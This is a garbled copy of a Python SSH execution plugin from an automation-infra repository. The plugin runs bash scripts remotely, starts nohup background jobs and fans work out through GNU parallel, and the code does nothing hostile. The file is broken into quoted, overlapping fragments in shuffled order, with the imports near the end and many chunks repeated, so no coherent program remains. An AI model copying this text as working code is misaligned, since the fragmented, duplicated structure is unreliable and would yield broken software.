"= \"\\n\".join([ \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s 1>%(out)s 2>%(err)s& echo",
"chan.makefile('wb', -1) stdout = chan.makefile('rb', -1) stderr = chan.makefile_stderr('rb', -1) stdin.close() output =",
"dict( bash_script=bash_script, out=out_filename, err=err_filename, pid=pid_filename, status=status_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) except CalledProcessError as e:",
"max_jobs, \" 1>%s 2>%s &\" % (out_filename, err_filename)) command = \"\\n\".join([\"mkdir %s\" %",
"output_timeout, output)) e.output = output raise e return \"\".join(output_array) def _exec(self, command): transport",
"scripts, base_dir) except Exception as e: e.args += ('When running bash script \"%s\"'",
"Partial output was\\n:%s\" % ( output_timeout, output)) e.output = output raise e return",
"def script(self, bash_script, output_timeout=20 * 60): return self.script_v2(bash_script, output_timeout).stdout def script_v2(self, bash_script, output_timeout=20",
"running bash script \"%s\"' % command), raise def background_parallel(self, scripts, max_jobs=None): base_dir =",
"self.execute(command, output_timeout) return parallel.Parallel(self, scripts, base_dir) except Exception as e: e.args += ('When",
"os.path.join(base_dir, \"parallel.status\") parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs, \" 1>%s 2>%s &\" % (out_filename,",
"output_timeout=20 * 60): transport = self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) chan.settimeout(output_timeout) stdin",
"echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=bash_script, out=out_filename, err=err_filename, pid=pid_filename, status=status_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try:",
"random_base + \".retcode\" command = \"\\n\".join([ \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\",",
"err_filename)) command = \"\\n\".join([\"mkdir %s\" % base_dir, \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null",
"stderr.close() self._logger.debug(\"SSH command: %(command)s\", dict(command=command)) self._logger.debug(\"Execution output: %(output)s\", dict(output=output)) if status != 0:",
"= tempfile.mktemp(prefix='background', dir='/tmp/') pid_filename = random_base + \".pid\" out_filename = random_base + \".out\"",
"e.output = output raise e return \"\".join(output_array) def _exec(self, command): transport = self._ssh_client.get_transport()",
"pid_filename = os.path.join(base_dir, \"parallel.pid\") out_filename = os.path.join(base_dir, \"parallel.out\") err_filename = os.path.join(base_dir, \"parallel.err\") status_filename",
"try: self.execute(command, output_timeout) return parallel.Parallel(self, scripts, base_dir) except Exception as e: e.args +=",
"output_timeout).stdout def script_v2(self, bash_script, output_timeout=20 * 60): self._logger.debug(\"Running bash script:\\n\\n%(bash_script)s\\n\", dict(bash_script=bash_script)) command =",
"running '%s', status '%s'\" % (bash_script, e.returncode)) return background.Background(self, bash_script, pid_filename, out_filename, err_filename,",
"(bash_script, e.returncode)) return background.Background(self, bash_script, pid_filename, out_filename, err_filename, status_filename) def _parallel_commands(self, base_dir, scripts,",
"status '%s'\" % (bash_script, e.returncode)) return background.Background(self, bash_script, pid_filename, out_filename, err_filename, status_filename) def",
"output stdout.close() stderr.close() self._logger.debug(\"SSH command: %(command)s\", dict(command=command)) self._logger.debug(\"Execution output: %(output)s\", dict(output=output)) if status",
"('When running bash script \"%s\"' % command), raise def background_parallel(self, scripts, max_jobs=None): base_dir",
"error completed_process.stdout = output stdout.close() stderr.close() self._logger.debug(\"SSH command: %(command)s\", dict(command=command)) self._logger.debug(\"Execution output: %(output)s\",",
"% dict(script=script, out=parallel.Parallel.outfile(base_dir, i), err=parallel.Parallel.errfile(base_dir, i), status=parallel.Parallel.statusfile(base_dir, i), pid=parallel.Parallel.pidfile(base_dir, i)) for i, script",
"= self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) status = chan.recv_exit_status() if status !=",
"completed_process.stderr = error completed_process.stdout = output stdout.close() stderr.close() self._logger.debug(\"SSH command: %(command)s\", dict(command=command)) self._logger.debug(\"Execution",
"= transport.open_session() try: chan.exec_command(command) status = chan.recv_exit_status() if status != 0: raise subprocess.CalledProcessError(status,",
"return self.execute(command, output_timeout) def execute(self, command, output_timeout=20 * 60): transport = self._ssh_client.get_transport() chan",
"subprocess.CalledProcessError(status, command) finally: chan.close() def background_script(self, bash_script): random_base = tempfile.mktemp(prefix='background', dir='/tmp/') pid_filename =",
"/dev/null &\", \"(%(bash_script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=bash_script, out=out_filename,",
"base_dir, scripts, max_jobs, command_suffix=\"\"): max_jobs = max_jobs or 0 script_commands = [\"((%(script)s 1>%(out)s",
"--jobs=%d << 'PARALLEL_SCRIPT' %s\" % (max_jobs, command_suffix), joined_script_commands, \"PARALLEL_SCRIPT\\n\"]) def parallel(self, scripts, max_jobs=None,",
"finally: chan.close() def _read_output(self, stdout, output_timeout): output_array = [] try: while True: segment",
"= output raise e return \"\".join(output_array) def _exec(self, command): transport = self._ssh_client.get_transport() chan",
"{command} failed with errorcode {completed_process.returncode}: \\nstdout: {completed_process.stdout} \\nstderr: {completed_process.stderr}') raise CalledProcessError(completed_process.returncode, completed_process.args, completed_process.stdout,",
"= os.path.join(base_dir, \"parallel.status\") parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs, \" 1>%s 2>%s &\" %",
"err_filename, status_filename) except CalledProcessError as e: raise Exception(\"Failed running '%s', status '%s'\" %",
"(out_filename, err_filename)) command = \"\\n\".join([\"mkdir %s\" % base_dir, \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >&",
"output_array = [] try: while True: segment = stdout.read().decode('utf-8') if segment == \"\":",
"CalledProcessError(completed_process.returncode, completed_process.args, completed_process.stdout, completed_process.stderr) return completed_process finally: chan.close() def _read_output(self, stdout, output_timeout): output_array",
"background.Background(self, bash_script, pid_filename, out_filename, err_filename, status_filename) def _parallel_commands(self, base_dir, scripts, max_jobs, command_suffix=\"\"): max_jobs",
"os.path.join(base_dir, \"parallel.err\") status_filename = os.path.join(base_dir, \"parallel.status\") parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs, \" 1>%s",
"completed_process.stdout = output stdout.close() stderr.close() self._logger.debug(\"SSH command: %(command)s\", dict(command=command)) self._logger.debug(\"Execution output: %(output)s\", dict(output=output))",
"i)) for i, script in enumerate(scripts)] joined_script_commands = \"\\n\".join(script_commands) return \"\\n\".join([\"parallel --no-notice --jobs=%d",
"= chan.makefile('wb', -1) stdout = chan.makefile('rb', -1) stderr = chan.makefile_stderr('rb', -1) stdin.close() output",
"0: raise subprocess.CalledProcessError(status, command) finally: chan.close() def background_script(self, bash_script): random_base = tempfile.mktemp(prefix='background', dir='/tmp/')",
"output_timeout=20 * 60): return self.script_v2(bash_script, output_timeout).stdout def script_v2(self, bash_script, output_timeout=20 * 60): self._logger.debug(\"Running",
"= \"\\n\".join([\"mkdir %s\" % base_dir, \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s",
"\"Timeout executing, no input for timeout of '%s'. Partial output was\\n:%s\" % (",
"= chan.recv_exit_status() error = stderr.read().decode('utf-8') completed_process = subprocess.CompletedProcess(command, status) completed_process.stderr = error completed_process.stdout",
"* 60): transport = self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) chan.settimeout(output_timeout) stdin =",
"= error completed_process.stdout = output stdout.close() stderr.close() self._logger.debug(\"SSH command: %(command)s\", dict(command=command)) self._logger.debug(\"Execution output:",
"\"\\n\".join([\"mkdir %s\" % base_dir, \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s echo",
"CalledProcessError as e: raise Exception(\"Failed running '%s', status '%s'\" % (bash_script, e.returncode)) return",
"from subprocess import CalledProcessError class Run(object): def __init__(self, ssh_client): self._ssh_client = ssh_client self._logger",
"% base_dir, parallel_cmd]) try: self.execute(command, output_timeout) return parallel.Parallel(self, scripts, base_dir) except Exception as",
"\"\\n\".join([ \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait",
"= ssh_client self._logger = logging.getLogger('ssh') def script(self, bash_script, output_timeout=20 * 60): return self.script_v2(bash_script,",
"err_filename = os.path.join(base_dir, \"parallel.err\") status_filename = os.path.join(base_dir, \"parallel.status\") parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs,",
"self._read_output(stdout, output_timeout) status = chan.recv_exit_status() error = stderr.read().decode('utf-8') completed_process = subprocess.CompletedProcess(command, status) completed_process.stderr",
"logging.getLogger('ssh') def script(self, bash_script, output_timeout=20 * 60): return self.script_v2(bash_script, output_timeout).stdout def script_v2(self, bash_script,",
"(max_jobs, command_suffix), joined_script_commands, \"PARALLEL_SCRIPT\\n\"]) def parallel(self, scripts, max_jobs=None, output_timeout=20 * 60): base_dir =",
"status=status_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) except CalledProcessError as e: raise Exception(\"Failed running '%s', status",
"!= 0: raise subprocess.CalledProcessError(status, command) finally: chan.close() def background_script(self, bash_script): random_base = tempfile.mktemp(prefix='background',",
"status = chan.recv_exit_status() error = stderr.read().decode('utf-8') completed_process = subprocess.CompletedProcess(command, status) completed_process.stderr = error",
"pid=pid_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) return parallel.BackgroundParallel(self, scripts, base_dir, pid_filename, out_filename, err_filename, status_filename) except",
"<< 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=parallel_cmd,",
"background_script(self, bash_script): random_base = tempfile.mktemp(prefix='background', dir='/tmp/') pid_filename = random_base + \".pid\" out_filename =",
"output_timeout): output_array = [] try: while True: segment = stdout.read().decode('utf-8') if segment ==",
"self._logger.debug(\"Running bash script:\\n\\n%(bash_script)s\\n\", dict(bash_script=bash_script)) command = \"\\n\".join([ \"sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF'\", bash_script, \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) return",
"status) completed_process.stderr = error completed_process.stdout = output stdout.close() stderr.close() self._logger.debug(\"SSH command: %(command)s\", dict(command=command))",
"scripts, max_jobs) command = \"\\n\".join([\"mkdir %s\" % base_dir, parallel_cmd]) try: self.execute(command, output_timeout) return",
"ssh_client): self._ssh_client = ssh_client self._logger = logging.getLogger('ssh') def script(self, bash_script, output_timeout=20 * 60):",
"self._parallel_commands(base_dir, scripts, max_jobs, \" 1>%s 2>%s &\" % (out_filename, err_filename)) command = \"\\n\".join([\"mkdir",
"self._logger.debug(\"SSH command: %(command)s\", dict(command=command)) self._logger.debug(\"Execution output: %(output)s\", dict(output=output)) if status != 0: self._logger.debug(f'command",
"subprocess from subprocess import CalledProcessError class Run(object): def __init__(self, ssh_client): self._ssh_client = ssh_client",
"__init__(self, ssh_client): self._ssh_client = ssh_client self._logger = logging.getLogger('ssh') def script(self, bash_script, output_timeout=20 *",
"with errorcode {completed_process.returncode}: \\nstdout: {completed_process.stdout} \\nstderr: {completed_process.stderr}') raise CalledProcessError(completed_process.returncode, completed_process.args, completed_process.stdout, completed_process.stderr) return",
"tempfile.mktemp(prefix='background', dir='/tmp/') pid_filename = random_base + \".pid\" out_filename = random_base + \".out\" err_filename",
"import subprocess from subprocess import CalledProcessError class Run(object): def __init__(self, ssh_client): self._ssh_client =",
"\"sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF'\", bash_script, \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) return self.execute(command, output_timeout) def execute(self, command, output_timeout=20 *",
"chan.close() def _read_output(self, stdout, output_timeout): output_array = [] try: while True: segment =",
"= chan.recv_exit_status() if status != 0: raise subprocess.CalledProcessError(status, command) finally: chan.close() def background_script(self,",
"%s\" % (max_jobs, command_suffix), joined_script_commands, \"PARALLEL_SCRIPT\\n\"]) def parallel(self, scripts, max_jobs=None, output_timeout=20 * 60):",
"\"\\n\".join([\"mkdir %s\" % base_dir, parallel_cmd]) try: self.execute(command, output_timeout) return parallel.Parallel(self, scripts, base_dir) except",
"= self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) chan.settimeout(output_timeout) stdin = chan.makefile('wb', -1) stdout",
"of '%s'. Partial output was\\n:%s\" % ( output_timeout, output)) e.output = output raise",
"= stderr.read().decode('utf-8') completed_process = subprocess.CompletedProcess(command, status) completed_process.stderr = error completed_process.stdout = output stdout.close()",
"max_jobs = max_jobs or 0 script_commands = [\"((%(script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo",
"= subprocess.CompletedProcess(command, status) completed_process.stderr = error completed_process.stdout = output stdout.close() stderr.close() self._logger.debug(\"SSH command:",
"os.path.join(base_dir, \"parallel.pid\") out_filename = os.path.join(base_dir, \"parallel.out\") err_filename = os.path.join(base_dir, \"parallel.err\") status_filename = os.path.join(base_dir,",
"max_jobs=None): base_dir = tempfile.mktemp(dir='/tmp/') pid_filename = os.path.join(base_dir, \"parallel.pid\") out_filename = os.path.join(base_dir, \"parallel.out\") err_filename",
"completed_process = subprocess.CompletedProcess(command, status) completed_process.stderr = error completed_process.stdout = output stdout.close() stderr.close() self._logger.debug(\"SSH",
"def _exec(self, command): transport = self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) status =",
"self.script_v2(bash_script, output_timeout).stdout def script_v2(self, bash_script, output_timeout=20 * 60): self._logger.debug(\"Running bash script:\\n\\n%(bash_script)s\\n\", dict(bash_script=bash_script)) command",
"pid_filename, out_filename, err_filename, status_filename) def _parallel_commands(self, base_dir, scripts, max_jobs, command_suffix=\"\"): max_jobs = max_jobs",
"def background_parallel(self, scripts, max_jobs=None): base_dir = tempfile.mktemp(dir='/tmp/') pid_filename = os.path.join(base_dir, \"parallel.pid\") out_filename =",
"% dict( bash_script=parallel_cmd, out=out_filename, err=err_filename, status=status_filename, pid=pid_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) return parallel.BackgroundParallel(self, scripts,",
"pid_filename = random_base + \".pid\" out_filename = random_base + \".out\" err_filename = random_base",
"[\"((%(script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s)\" % dict(script=script, out=parallel.Parallel.outfile(base_dir, i), err=parallel.Parallel.errfile(base_dir, i),",
"err_filename, status_filename) def _parallel_commands(self, base_dir, scripts, max_jobs, command_suffix=\"\"): max_jobs = max_jobs or 0",
"%(output)s\", dict(output=output)) if status != 0: self._logger.debug(f'command {command} failed with errorcode {completed_process.returncode}: \\nstdout:",
"command): transport = self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) status = chan.recv_exit_status() if",
"if status != 0: raise subprocess.CalledProcessError(status, command) finally: chan.close() def background_script(self, bash_script): random_base",
"self._parallel_commands(base_dir, scripts, max_jobs) command = \"\\n\".join([\"mkdir %s\" % base_dir, parallel_cmd]) try: self.execute(command, output_timeout)",
"= random_base + \".pid\" out_filename = random_base + \".out\" err_filename = random_base +",
"60): transport = self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) chan.settimeout(output_timeout) stdin = chan.makefile('wb',",
"dict(script=script, out=parallel.Parallel.outfile(base_dir, i), err=parallel.Parallel.errfile(base_dir, i), status=parallel.Parallel.statusfile(base_dir, i), pid=parallel.Parallel.pidfile(base_dir, i)) for i, script in",
"'PARALLEL_SCRIPT' %s\" % (max_jobs, command_suffix), joined_script_commands, \"PARALLEL_SCRIPT\\n\"]) def parallel(self, scripts, max_jobs=None, output_timeout=20 *",
"background_parallel(self, scripts, max_jobs=None): base_dir = tempfile.mktemp(dir='/tmp/') pid_filename = os.path.join(base_dir, \"parallel.pid\") out_filename = os.path.join(base_dir,",
"enumerate(scripts)] joined_script_commands = \"\\n\".join(script_commands) return \"\\n\".join([\"parallel --no-notice --jobs=%d << 'PARALLEL_SCRIPT' %s\" % (max_jobs,",
"2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=bash_script, out=out_filename, err=err_filename, pid=pid_filename, status=status_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"])",
"1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=bash_script, out=out_filename, err=err_filename, pid=pid_filename, status=status_filename),",
"%s\" % base_dir, parallel_cmd]) try: self.execute(command, output_timeout) return parallel.Parallel(self, scripts, base_dir) except Exception",
"2>%s &\" % (out_filename, err_filename)) command = \"\\n\".join([\"mkdir %s\" % base_dir, \"nohup sh",
"parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs, \" 1>%s 2>%s &\" % (out_filename, err_filename)) command",
"joined_script_commands = \"\\n\".join(script_commands) return \"\\n\".join([\"parallel --no-notice --jobs=%d << 'PARALLEL_SCRIPT' %s\" % (max_jobs, command_suffix),",
"parallel import tempfile import os import subprocess from subprocess import CalledProcessError class Run(object):",
"'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=parallel_cmd, out=out_filename,",
"\"(%(bash_script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=bash_script, out=out_filename, err=err_filename, pid=pid_filename,",
"completed_process finally: chan.close() def _read_output(self, stdout, output_timeout): output_array = [] try: while True:",
"+ \".out\" err_filename = random_base + \".err\" status_filename = random_base + \".retcode\" command",
"stdout.read().decode('utf-8') if segment == \"\": break output_array.append(segment) except socket.timeout: output = \"\".join(output_array) e",
"try: while True: segment = stdout.read().decode('utf-8') if segment == \"\": break output_array.append(segment) except",
"self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) chan.settimeout(output_timeout) stdin = chan.makefile('wb', -1) stdout =",
"= stdout.read().decode('utf-8') if segment == \"\": break output_array.append(segment) except socket.timeout: output = \"\".join(output_array)",
"+ \".err\" status_filename = random_base + \".retcode\" command = \"\\n\".join([ \"nohup sh <<",
"if segment == \"\": break output_array.append(segment) except socket.timeout: output = \"\".join(output_array) e =",
"e.args += ('When running bash script \"%s\"' % command), raise def background_parallel(self, scripts,",
"base_dir = tempfile.mktemp(dir='/tmp/') parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs) command = \"\\n\".join([\"mkdir %s\" %",
"self.execute(command, output_timeout) def execute(self, command, output_timeout=20 * 60): transport = self._ssh_client.get_transport() chan =",
"import os import subprocess from subprocess import CalledProcessError class Run(object): def __init__(self, ssh_client):",
"$?>%(status)s\" % dict( bash_script=bash_script, out=out_filename, err=err_filename, pid=pid_filename, status=status_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) except CalledProcessError",
"= output stdout.close() stderr.close() self._logger.debug(\"SSH command: %(command)s\", dict(command=command)) self._logger.debug(\"Execution output: %(output)s\", dict(output=output)) if",
"os import subprocess from subprocess import CalledProcessError class Run(object): def __init__(self, ssh_client): self._ssh_client",
"+ \".pid\" out_filename = random_base + \".out\" err_filename = random_base + \".err\" status_filename",
"script \"%s\"' % command), raise def background_parallel(self, scripts, max_jobs=None): base_dir = tempfile.mktemp(dir='/tmp/') pid_filename",
"{completed_process.stderr}') raise CalledProcessError(completed_process.returncode, completed_process.args, completed_process.stdout, completed_process.stderr) return completed_process finally: chan.close() def _read_output(self, stdout,",
"command: %(command)s\", dict(command=command)) self._logger.debug(\"Execution output: %(output)s\", dict(output=output)) if status != 0: self._logger.debug(f'command {command}",
"\"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) except CalledProcessError as e: raise Exception(\"Failed running '%s', status '%s'\"",
"% dict( bash_script=bash_script, out=out_filename, err=err_filename, pid=pid_filename, status=status_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) except CalledProcessError as",
"completed_process.args, completed_process.stdout, completed_process.stderr) return completed_process finally: chan.close() def _read_output(self, stdout, output_timeout): output_array =",
"\"PARALLEL_SCRIPT\\n\"]) def parallel(self, scripts, max_jobs=None, output_timeout=20 * 60): base_dir = tempfile.mktemp(dir='/tmp/') parallel_cmd =",
"automation_infra.plugins import background, parallel import tempfile import os import subprocess from subprocess import",
"err=parallel.Parallel.errfile(base_dir, i), status=parallel.Parallel.statusfile(base_dir, i), pid=parallel.Parallel.pidfile(base_dir, i)) for i, script in enumerate(scripts)] joined_script_commands =",
"$!);echo $?>%(status)s\" % dict( bash_script=bash_script, out=out_filename, err=err_filename, pid=pid_filename, status=status_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) except",
"dict(output=output)) if status != 0: self._logger.debug(f'command {command} failed with errorcode {completed_process.returncode}: \\nstdout: {completed_process.stdout}",
"= [] try: while True: segment = stdout.read().decode('utf-8') if segment == \"\": break",
"break output_array.append(segment) except socket.timeout: output = \"\".join(output_array) e = socket.timeout( \"Timeout executing, no",
"bash script:\\n\\n%(bash_script)s\\n\", dict(bash_script=bash_script)) command = \"\\n\".join([ \"sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF'\", bash_script, \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) return self.execute(command,",
"status=parallel.Parallel.statusfile(base_dir, i), pid=parallel.Parallel.pidfile(base_dir, i)) for i, script in enumerate(scripts)] joined_script_commands = \"\\n\".join(script_commands) return",
"dict( bash_script=parallel_cmd, out=out_filename, err=err_filename, status=status_filename, pid=pid_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) return parallel.BackgroundParallel(self, scripts, base_dir,",
"background, parallel import tempfile import os import subprocess from subprocess import CalledProcessError class",
"return completed_process finally: chan.close() def _read_output(self, stdout, output_timeout): output_array = [] try: while",
"no input for timeout of '%s'. Partial output was\\n:%s\" % ( output_timeout, output))",
"= [\"((%(script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s)\" % dict(script=script, out=parallel.Parallel.outfile(base_dir, i), err=parallel.Parallel.errfile(base_dir,",
"$?>%(status)s)\" % dict(script=script, out=parallel.Parallel.outfile(base_dir, i), err=parallel.Parallel.errfile(base_dir, i), status=parallel.Parallel.statusfile(base_dir, i), pid=parallel.Parallel.pidfile(base_dir, i)) for i,",
"1>%s 2>%s &\" % (out_filename, err_filename)) command = \"\\n\".join([\"mkdir %s\" % base_dir, \"nohup",
"\".pid\" out_filename = random_base + \".out\" err_filename = random_base + \".err\" status_filename =",
"script_commands = [\"((%(script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s)\" % dict(script=script, out=parallel.Parallel.outfile(base_dir, i),",
"output raise e return \"\".join(output_array) def _exec(self, command): transport = self._ssh_client.get_transport() chan =",
"= os.path.join(base_dir, \"parallel.out\") err_filename = os.path.join(base_dir, \"parallel.err\") status_filename = os.path.join(base_dir, \"parallel.status\") parallel_cmd =",
"def parallel(self, scripts, max_jobs=None, output_timeout=20 * 60): base_dir = tempfile.mktemp(dir='/tmp/') parallel_cmd = self._parallel_commands(base_dir,",
"command = \"\\n\".join([ \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s 1>%(out)s 2>%(err)s&",
"Run(object): def __init__(self, ssh_client): self._ssh_client = ssh_client self._logger = logging.getLogger('ssh') def script(self, bash_script,",
"{completed_process.stdout} \\nstderr: {completed_process.stderr}') raise CalledProcessError(completed_process.returncode, completed_process.args, completed_process.stdout, completed_process.stderr) return completed_process finally: chan.close() def",
"Exception(\"Failed running '%s', status '%s'\" % (bash_script, e.returncode)) return background.Background(self, bash_script, pid_filename, out_filename,",
"= transport.open_session() try: chan.exec_command(command) chan.settimeout(output_timeout) stdin = chan.makefile('wb', -1) stdout = chan.makefile('rb', -1)",
"as e: raise Exception(\"Failed running '%s', status '%s'\" % (bash_script, e.returncode)) return background.Background(self,",
"&\", \"(%(bash_script)s echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=parallel_cmd, out=out_filename, err=err_filename, status=status_filename, pid=pid_filename),",
"socket import logging from automation_infra.plugins import background, parallel import tempfile import os import",
"= chan.makefile_stderr('rb', -1) stdin.close() output = self._read_output(stdout, output_timeout) status = chan.recv_exit_status() error =",
"out_filename = os.path.join(base_dir, \"parallel.out\") err_filename = os.path.join(base_dir, \"parallel.err\") status_filename = os.path.join(base_dir, \"parallel.status\") parallel_cmd",
"\"\": break output_array.append(segment) except socket.timeout: output = \"\".join(output_array) e = socket.timeout( \"Timeout executing,",
"\"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) return parallel.BackgroundParallel(self, scripts, base_dir, pid_filename, out_filename, err_filename, status_filename) except CalledProcessError",
"self._exec(command) return parallel.BackgroundParallel(self, scripts, base_dir, pid_filename, out_filename, err_filename, status_filename) except CalledProcessError as e:",
"output_timeout=20 * 60): self._logger.debug(\"Running bash script:\\n\\n%(bash_script)s\\n\", dict(bash_script=bash_script)) command = \"\\n\".join([ \"sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF'\",",
"\".retcode\" command = \"\\n\".join([ \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s 1>%(out)s",
"\"parallel.err\") status_filename = os.path.join(base_dir, \"parallel.status\") parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs, \" 1>%s 2>%s",
"transport.open_session() try: chan.exec_command(command) chan.settimeout(output_timeout) stdin = chan.makefile('wb', -1) stdout = chan.makefile('rb', -1) stderr",
"-1) stderr = chan.makefile_stderr('rb', -1) stdin.close() output = self._read_output(stdout, output_timeout) status = chan.recv_exit_status()",
"<reponame>AnyVisionltd/automation-infra<filename>automation_infra/plugins/run.py import socket import logging from automation_infra.plugins import background, parallel import tempfile import",
"chan.exec_command(command) chan.settimeout(output_timeout) stdin = chan.makefile('wb', -1) stdout = chan.makefile('rb', -1) stderr = chan.makefile_stderr('rb',",
"'%s', status '%s'\" % (bash_script, e.returncode)) return background.Background(self, bash_script, pid_filename, out_filename, err_filename, status_filename)",
"socket.timeout: output = \"\".join(output_array) e = socket.timeout( \"Timeout executing, no input for timeout",
"base_dir, pid_filename, out_filename, err_filename, status_filename) except CalledProcessError as e: raise Exception(\"Failed running '%s',",
"raise CalledProcessError(completed_process.returncode, completed_process.args, completed_process.stdout, completed_process.stderr) return completed_process finally: chan.close() def _read_output(self, stdout, output_timeout):",
"except socket.timeout: output = \"\".join(output_array) e = socket.timeout( \"Timeout executing, no input for",
"parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs) command = \"\\n\".join([\"mkdir %s\" % base_dir, parallel_cmd]) try:",
"return parallel.BackgroundParallel(self, scripts, base_dir, pid_filename, out_filename, err_filename, status_filename) except CalledProcessError as e: raise",
"execute(self, command, output_timeout=20 * 60): transport = self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command)",
"output = \"\".join(output_array) e = socket.timeout( \"Timeout executing, no input for timeout of",
"-1) stdin.close() output = self._read_output(stdout, output_timeout) status = chan.recv_exit_status() error = stderr.read().decode('utf-8') completed_process",
"random_base + \".out\" err_filename = random_base + \".err\" status_filename = random_base + \".retcode\"",
"\"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo",
"pid_filename, out_filename, err_filename, status_filename) except CalledProcessError as e: raise Exception(\"Failed running '%s', status",
"stdout = chan.makefile('rb', -1) stderr = chan.makefile_stderr('rb', -1) stdin.close() output = self._read_output(stdout, output_timeout)",
"completed_process.stdout, completed_process.stderr) return completed_process finally: chan.close() def _read_output(self, stdout, output_timeout): output_array = []",
"bash script \"%s\"' % command), raise def background_parallel(self, scripts, max_jobs=None): base_dir = tempfile.mktemp(dir='/tmp/')",
"chan.settimeout(output_timeout) stdin = chan.makefile('wb', -1) stdout = chan.makefile('rb', -1) stderr = chan.makefile_stderr('rb', -1)",
"timeout of '%s'. Partial output was\\n:%s\" % ( output_timeout, output)) e.output = output",
"ssh_client self._logger = logging.getLogger('ssh') def script(self, bash_script, output_timeout=20 * 60): return self.script_v2(bash_script, output_timeout).stdout",
"= random_base + \".err\" status_filename = random_base + \".retcode\" command = \"\\n\".join([ \"nohup",
"except CalledProcessError as e: raise Exception(\"Failed running '%s', status '%s'\" % (scripts, e.returncode))",
"chan.recv_exit_status() if status != 0: raise subprocess.CalledProcessError(status, command) finally: chan.close() def background_script(self, bash_script):",
"\"\".join(output_array) e = socket.timeout( \"Timeout executing, no input for timeout of '%s'. Partial",
"status != 0: self._logger.debug(f'command {command} failed with errorcode {completed_process.returncode}: \\nstdout: {completed_process.stdout} \\nstderr: {completed_process.stderr}')",
"e: raise Exception(\"Failed running '%s', status '%s'\" % (bash_script, e.returncode)) return background.Background(self, bash_script,",
"def execute(self, command, output_timeout=20 * 60): transport = self._ssh_client.get_transport() chan = transport.open_session() try:",
"max_jobs or 0 script_commands = [\"((%(script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s)\" %",
